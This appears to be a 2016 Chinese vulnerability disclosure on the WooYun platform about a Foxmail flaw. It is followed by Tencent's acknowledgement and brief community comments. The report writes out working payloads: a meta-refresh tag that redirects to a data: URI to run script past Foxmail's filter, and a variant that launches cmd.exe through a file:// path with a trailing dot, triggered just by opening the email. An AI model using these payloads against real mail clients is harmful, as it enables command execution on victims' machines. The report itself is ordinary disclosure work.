Foxmail邮件客户端远程命令执行漏洞

Foxmail本身对邮件的body是有XSS filter的，但发现支持<meta>标签。

meta可以干很多事情，可以自定义一个http head等，foxmail并未对meta标签的内容进行检测

以下是能执行XSS的verctor

<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E">

这个verctor是挺有意思的 ，利用meta标签，添加一个refresh属性，可以设置时间，这里设置的是0秒，就是立即跳转，使当前页面重定向，而重定向的页面就是data伪协议

data:text/html,<script>alert(1)</script>

。相当于把页面重定向到另外一个带js的页面了，从而突破Foxmail本身的防御策略。

用meta和data伪协议这种verctor在一般网页上或许没什么用处，因为data伪协议是独立的空白域，也就是说一般不在任何域内，不像普通的xss就直接能获取当前域内的信息。而这种xss在客户端内就大有用处了。

利用XSS执行命令

<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E">

利用客户端的缺陷可以直接使用open打开任意程序

对 file://C:/windows/system32/cmd.exe这样的路径Foxmail本身是无法执行的，但在后面加一个"."就能突破

点击邮箱就执行

对meta标签进行过滤

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-04 09:26

厂商回复：

非常感谢您的报告，问题已着手处理，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

最新状态：

暂无

1. 2016-03-03 13:11 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)

   3

   前排

   1# 回复此人

2. 2016-03-03 13:17 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)

   2

   six six six

   2# 回复此人

3. 2016-03-03 13:17 | 风格 ( 实习白帽子 | Rank:37 漏洞数:12 | 注册为白帽子，你可以在这里提交你发现的漏...)

   2

   前排

   3# 回复此人

4. 2016-03-03 13:19 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   2

   mark

   4# 回复此人

5. 2016-03-03 13:22 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   2

   6

   5# 回复此人

6. 2016-03-03 13:30 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

   2

   跳蛋流要变邮箱流了？

   6# 回复此人

7. 2016-03-03 13:44 | answer ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)

   2

   前排

   7# 回复此人

8. 2016-03-03 13:52 | Sevck ( 路人 | Rank:2 漏洞数:2 )

   2

   屌屌的

   8# 回复此人

9. 2016-03-03 13:54 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

   2

   这个还得突破下

   9# 回复此人

10. 2016-03-03 14:00 | 数据流 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊，我们还有音乐)

    2

    @xsser 嗯 还能干其他事情，例如窃取邮件啥的

    10# 回复此人

11. 2016-03-03 14:07 | Praise ( 路人 | Rank:10 漏洞数:1 | null 开心就要笑得如痴如醉~)

    2

    Mark

    11# 回复此人

12. 2016-03-03 14:28 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    2

    12# 回复此人

13. 2016-03-03 14:58 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

    2

    收藏。。

    13# 回复此人

14. 2016-03-03 16:18 | 梧桐雨 ( 核心白帽子 | Rank:1662 漏洞数:191 | 学无止境)

    2

    流哥最近高产呀，关注。

    14# 回复此人

15. 2016-03-03 16:24 | 秦风 ( 实习白帽子 | Rank:40 漏洞数:10 | 血染江山的画 怎敌妳眉间一点朱砂 覆...)

    2

    mark

    15# 回复此人

16. 2016-03-03 16:24 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    2

    666

    16# 回复此人

17. 2016-03-03 16:31 | blast ( 普通白帽子 | Rank:373 漏洞数:60 | Destruction brings construction)

    2

    跳哥……蛋哥威武

    17# 回复此人

18. 2016-03-03 16:36 | 数据流 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊，我们还有音乐)

    2

    @梧桐雨 (ง •̀_•́)ง

    18# 回复此人

19. 2016-03-03 16:36 | 数据流 ( 普通白帽子 | Rank:817 漏洞数:100 | 没关系啊，我们还有音乐)

    2

    @blast 翔哥你好 (ง •̀_•́)ง

    19# 回复此人

20. 2016-03-03 20:55 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸，懂的人会觉得很...)

    2

    666666666666666

    20# 回复此人

21. 2016-03-04 09:30 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

    2

    6666666

    21# 回复此人

22. 2016-03-04 09:53 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀！)

    2

    吓得我赶紧把foxmail卸载了

    22# 回复此人

23. 2016-03-04 11:38 | Jovi ( 路人 | Rank:4 漏洞数:1 )

    2

    666666666

    23# 回复此人

24. 2016-03-07 10:25 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 有活跃团队要人么？求带飞)

    2

    好可怕

    24# 回复此人

25. 2016-03-07 10:26 | Lar2y ( 实习白帽子 | Rank:31 漏洞数:12 | 有活跃团队要人么？求带飞)

    2

    吓得我把乌云都关了

    25# 回复此人

26. 2016-03-07 11:02 | AK-47 ( 实习白帽子 | Rank:78 漏洞数:11 | 开开心心挖洞，踏踏实实上学！)

    2

    MARK

    26# 回复此人

27. 2016-03-07 19:59 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    2

    酷派安全应急响应中心：卧槽 叼叼叼

    27# 回复此人

28. 2016-03-11 10:23 | 小恒-blog ( 路人 | Rank:2 漏洞数:1 | 开始我是拒绝的，但是我要试一试，没有想到...)

    2

    厉害啊 啊啊呵呵呵

    28# 回复此人

29. 2016-03-19 15:27 | biubiu ( 路人 | Rank:18 漏洞数:6 | 我是流氓我怕谁)

    1

    来站位

    29# 回复此人

30. 2016-05-11 14:34 | Martial ( 普通白帽子 | Rank:2639 漏洞数:370 | 竟然还有人冒充我，醉了，骗子QQ445697541...)

    0

    有人成功了么

    30# 回复此人

31. 2016-06-02 09:42 | Sophone ( 路人 | Rank:6 漏洞数:5 | 屌丝一枚 共同学习)

    0

    新版本还有。。。。。

    31# 回复此人

32. 2016-06-02 09:56 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    叼叼叼

    32# 回复此人

33. 2016-06-02 10:10 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    verctor?vector?

    33# 回复此人

34. 2016-06-02 10:17 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    0

    Html Email

    34# 回复此人

35. 2016-06-02 11:06 | Me_Fortune ( 普通白帽子 | Rank:361 漏洞数:115 | The quiter you are,the more you're able ...)

    0

    @Martial @Sophone没成功浮现啊 。。。

    35# 回复此人

36. 2016-06-06 07:06 | 黑暗两匹狼 ( 路人 | Rank:10 漏洞数:2 | Anything)

    0

    这个太牛逼

    36# 回复此人